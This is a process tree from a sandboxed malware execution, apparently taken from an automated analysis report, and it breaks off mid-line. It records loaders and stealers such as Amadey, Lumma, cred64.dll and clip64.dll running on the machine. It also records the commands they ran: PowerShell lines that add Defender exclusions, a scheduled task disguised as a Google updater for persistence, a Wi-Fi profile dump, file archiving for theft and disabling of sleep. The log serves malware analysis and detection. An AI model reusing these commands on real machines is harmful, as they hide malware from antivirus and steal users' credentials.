C:\Windows\System32\conhost.exe jgqccdbbxrzbdlfm 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZe7ZXiwOLhA74FQzXCOhDuCEgX6WVRJena9L8fAOb/OCpbdBtftU9QMBxG8aHan0UHttTlDXmg8zTJWEzz1jyzM08ycWZiYcc5uJhds9Rh8+fDvfznlHAMreIYNxYX5k9xJHAc4B0ozcm5wxfAVR1NkkPB2hskLA90oq6EEwunLM+cHugrCZPmAL+xjChc1L0WUYPKljZ7G2hVhhzqEtgfjve5jiLrrwjfPxGeeAf9vve0gqrSPFO0K58xxNJ8ClGMYA3jdfqtywTWLARpI3q8mmFmhW90pU5VNfoa01PrEPOLs5r8ABfO582XBZtlugNpAIuxABxOKWLf8XQtXZvoQ7dHNPMO3GgNUOP3U0XxrRiFOF/vB7jsNiVJkb1bI5v5nt59vi2Czwj87T9ujtAUxaRW+5V3BDnzrgkctEMZcXBV724S22jgwV6IzKvy6UKGJnVaM3eKyvceEhYeYhPyF7ZZaH7hc6eH/4/zT7gy/FOEOKoQlj9wOdYItup8djwg3zNzf9whNSzJ/f9PwHpnsQ==
1⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
1⤵
PID:5900
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000030041\do.ps1"
  2⤵
  PID:5752
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
    3⤵
    PID:7228
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffdc7c49758,0x7ffdc7c49768,0x7ffdc7c49778
      4⤵
      PID:6184
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
    3⤵
    PID:11960
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      4⤵
      PID:10320
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.linkedin.com/login
    3⤵
    PID:8336
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xc8,0xd8,0x7ffdc7c49758,0x7ffdc7c49768,0x7ffdc7c49778
      4⤵
      PID:9312
- C:\Users\Admin\AppData\Local\Temp\1000031001\fu.exe
  "C:\Users\Admin\AppData\Local\Temp\1000031001\fu.exe"
  2⤵
  PID:3628
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
    3⤵
    PID:5888
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0x8,0xd8,0x7ffdc7c49758,0x7ffdc7c49768,0x7ffdc7c49778
      4⤵
      PID:4632
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1940 --field-trial-handle=1808,i,10774579049685028512,4895606771879128119,131072 /prefetch:8
      4⤵
      PID:12764
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    3⤵
    PID:5876
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffdc7c49758,0x7ffdc7c49768,0x7ffdc7c49778
      4⤵
      PID:4988
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2060 --field-trial-handle=1888,i,7035862685691406130,2239922120657935661,131072 /prefetch:8
      4⤵
      PID:7288
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3420 --field-trial-handle=1888,i,7035862685691406130,2239922120657935661,131072 /prefetch:8
      4⤵
      PID:7308
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
    3⤵
    PID:5088
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      4⤵
      PID:7232
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7232.0.1909000580\1272368730" -parentBuildID 20221007134813 -prefsHandle 1588 -prefMapHandle 1576 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e450ec30-4e39-4b70-8664-3d3e75833134} 7232 "\\.\pipe\gecko-crash-server-pipe.7232" 1684 19e212e9b58 gpu
        5⤵
        
        PID:6808
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7232.1.1825142997\2057071459" -parentBuildID 20221007134813 -prefsHandle 2084 -prefMapHandle 2080 -prefsLen 21608 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55cc8ec2-1794-4490-b27b-4fe30a595744} 7232 "\\.\pipe\gecko-crash-server-pipe.7232" 2096 19e20de4a58 socket
        5⤵
        
        PID:7756
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7232.2.2142558152\86183018" -childID 1 -isForBrowser -prefsHandle 3040 -prefMapHandle 3036 -prefsLen 21711 -prefMapSize 233444 -jsInitHandle 952 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e45dd2b2-c5db-4742-913c-2d7d6fb78e13} 7232 "\\.\pipe\gecko-crash-server-pipe.7232" 3052 19e2569ed58 tab
        5⤵
        
        PID:7652
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7232.3.945090509\86296690" -childID 2 -isForBrowser -prefsHandle 3252 -prefMapHandle 3248 -prefsLen 21752 -prefMapSize 233444 -jsInitHandle 952 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e624f713-8e50-4359-a684-d8f14aefa747} 7232 "\\.\pipe\gecko-crash-server-pipe.7232" 3264 19e25f43558 tab
        5⤵
        
        PID:8188
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7232.4.1539865633\1135965949" -childID 3 -isForBrowser -prefsHandle 3452 -prefMapHandle 3228 -prefsLen 21752 -prefMapSize 233444 -jsInitHandle 952 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {15ecdaba-c99c-4b41-893f-6257fad3d175} 7232 "\\.\pipe\gecko-crash-server-pipe.7232" 3076 19e26382058 tab
        5⤵
        
        PID:224
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7232.5.1383157775\925743748" -childID 4 -isForBrowser -prefsHandle 4100 -prefMapHandle 4092 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 952 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e997ff28-06a6-44d4-962a-e861a392a92c} 7232 "\\.\pipe\gecko-crash-server-pipe.7232" 4112 19e28b07258 tab
        5⤵
        
        PID:8668
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7232.8.563344207\1038915837" -childID 7 -isForBrowser -prefsHandle 5240 -prefMapHandle 5236 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 952 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7949c023-3a34-40a6-88a6-cc62257ad39c} 7232 "\\.\pipe\gecko-crash-server-pipe.7232" 5180 19e29ea7858 tab
        5⤵
        
        PID:6740
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7232.7.2002651071\794115197" -childID 6 -isForBrowser -prefsHandle 5184 -prefMapHandle 5188 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 952 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d597a1c-b068-4efd-a40c-72bc703d91b8} 7232 "\\.\pipe\gecko-crash-server-pipe.7232" 5264 19e29bb4f58 tab
        5⤵
        
        PID:1776
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7232.6.1944676728\1934537460" -childID 5 -isForBrowser -prefsHandle 4876 -prefMapHandle 4884 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 952 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8dc0dad8-5750-466f-8cd2-bce1a6874f7d} 7232 "\\.\pipe\gecko-crash-server-pipe.7232" 5032 19e16760158 tab
        5⤵
        
        PID:8484
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
    3⤵
    PID:7292
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
    3⤵
    PID:7208
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
      4⤵
      PID:7428
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
    3⤵
    PID:1012
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1784 --field-trial-handle=1844,i,15311507619015114863,15123907303664937355,131072 /prefetch:8
      4⤵
      PID:13024
- C:\Users\Admin\AppData\Local\Temp\1000032001\ladas.exe
  "C:\Users\Admin\AppData\Local\Temp\1000032001\ladas.exe"
  2⤵
  PID:5820
- C:\Users\Admin\AppData\Local\Temp\1000121001\Amadey.exe
  "C:\Users\Admin\AppData\Local\Temp\1000121001\Amadey.exe"
  2⤵
  PID:5796
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
  2⤵
  PID:2040
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
    3⤵
    PID:6148
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:6264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\682406436280_Desktop.zip' -CompressionLevel Optimal
      4⤵
      PID:6300
- C:\Users\Admin\AppData\Local\Temp\1000153001\for.exe
  "C:\Users\Admin\AppData\Local\Temp\1000153001\for.exe"
  2⤵
  PID:6460
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6376
  - - C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"
      4⤵
      PID:1428
  - - C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe"
      4⤵
      PID:6236
- C:\Users\Admin\AppData\Local\Temp\1000174001\Goldprime.exe
  "C:\Users\Admin\AppData\Local\Temp\1000174001\Goldprime.exe"
  2⤵
  PID:6896
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5324
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7096
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7112
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7040
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
  2⤵
  PID:6180
- C:\Users\Admin\AppData\Local\Temp\1000175001\dayroc.exe
  "C:\Users\Admin\AppData\Local\Temp\1000175001\dayroc.exe"
  2⤵
  PID:5804
- - C:\Users\Admin\AppData\Local\Temp\nine.exe
    "C:\Users\Admin\AppData\Local\Temp\nine.exe"
    3⤵
    PID:6308
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "nine.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nine.exe" & exit
      4⤵
      PID:6392
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "nine.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:6364
- - C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
    "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
    3⤵
    PID:6416
- - C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
    3⤵
    PID:6208
- C:\Users\Admin\AppData\Local\Temp\1000178001\newfilelunacy.exe
  "C:\Users\Admin\AppData\Local\Temp\1000178001\newfilelunacy.exe"
  2⤵
  PID:9268
- C:\Users\Admin\AppData\Local\Temp\1000186001\monetkamoya.exe
  "C:\Users\Admin\AppData\Local\Temp\1000186001\monetkamoya.exe"
  2⤵
  PID:2400
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:9864
- C:\Users\Admin\AppData\Local\Temp\1000194001\dota.exe
  "C:\Users\Admin\AppData\Local\Temp\1000194001\dota.exe"
  2⤵
  PID:4364
- C:\Users\Admin\AppData\Local\Temp\1000199001\joekr1234.exe
  "C:\Users\Admin\AppData\Local\Temp\1000199001\joekr1234.exe"
  2⤵
  PID:11176
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:10152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C AT /delete /yes
    3⤵
    PID:11344
  - - C:\Windows\SysWOW64\at.exe
      AT /delete /yes
      4⤵
      PID:11464
- C:\Users\Admin\AppData\Local\Temp\1000202001\lumma123142124.exe
  "C:\Users\Admin\AppData\Local\Temp\1000202001\lumma123142124.exe"
  2⤵
  PID:11776
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:11460
- C:\Users\Admin\AppData\Local\Temp\1000203001\new.exe
  "C:\Users\Admin\AppData\Local\Temp\1000203001\new.exe"
  2⤵
  PID:9436
- C:\Users\Admin\AppData\Local\Temp\1000204001\File300un.exe
  "C:\Users\Admin\AppData\Local\Temp\1000204001\File300un.exe"
  2⤵
  PID:10760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000204001\File300un.exe" -Force
    3⤵
    PID:12072
- - C:\Windows\SYSWOW64\calc.exe
    "C:\Windows\SYSWOW64\calc.exe"
    3⤵
    PID:11228
- C:\Users\Admin\AppData\Local\Temp\1000205001\daissss.exe
  "C:\Users\Admin\AppData\Local\Temp\1000205001\daissss.exe"
  2⤵
  PID:11524
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:10704

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6356

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6572

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
1⤵
PID:6960
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2240
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:5276

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6484

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
1⤵
PID:6872
- C:\Users\Admin\AppData\Local\Temp\1000018001\goldman1234.exe
  "C:\Users\Admin\AppData\Local\Temp\1000018001\goldman1234.exe"
  2⤵
  PID:7104
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:6912
- - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    3⤵
    PID:11104
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
      4⤵
      PID:5384
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:11776
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
  2⤵
  PID:6528
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
    3⤵
    PID:6256
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:2328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\682406436280_Desktop.zip' -CompressionLevel Optimal
      4⤵
      PID:6952
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
  2⤵
  PID:6752

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5076

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6604

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6248

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffdc7c49758,0x7ffdc7c49768,0x7ffdc7c49778
1⤵
PID:6228

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7584

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8408

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
1⤵
PID:8900

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7252

C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe
"C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe" -service -lunch
1⤵
PID:9368
- C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe"
  2⤵
  PID:7124

C:\Users\Admin\AppData\Roaming\rvgwbge
C:\Users\Admin\AppData\Roaming\rvgwbge
1⤵
PID:10048

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9424

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:11044

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:11036
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:8992
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:10148
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:9952
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:10596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:12056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#extmbyk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
PID:10996

C:\Windows\appcompat\services.exe
C:\Windows\appcompat\services.exe
1⤵
PID:11304

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:11696

C:\Windows\SysWOW64\cmd.exe
